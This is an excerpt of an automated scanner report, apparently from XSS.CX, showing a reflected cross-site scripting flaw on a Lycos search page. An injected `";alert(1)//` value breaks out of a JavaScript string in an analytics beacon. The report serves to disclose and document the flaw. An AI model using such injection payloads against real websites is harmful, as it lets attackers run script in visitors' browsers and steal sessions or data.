Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/video/",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A184a0";alert(1)//a41b54937a.lycos.com"
});
</script>
...[SNIP]...

Report generated by XSS.CX at Sun Dec 12 09:23:00 CST 2010.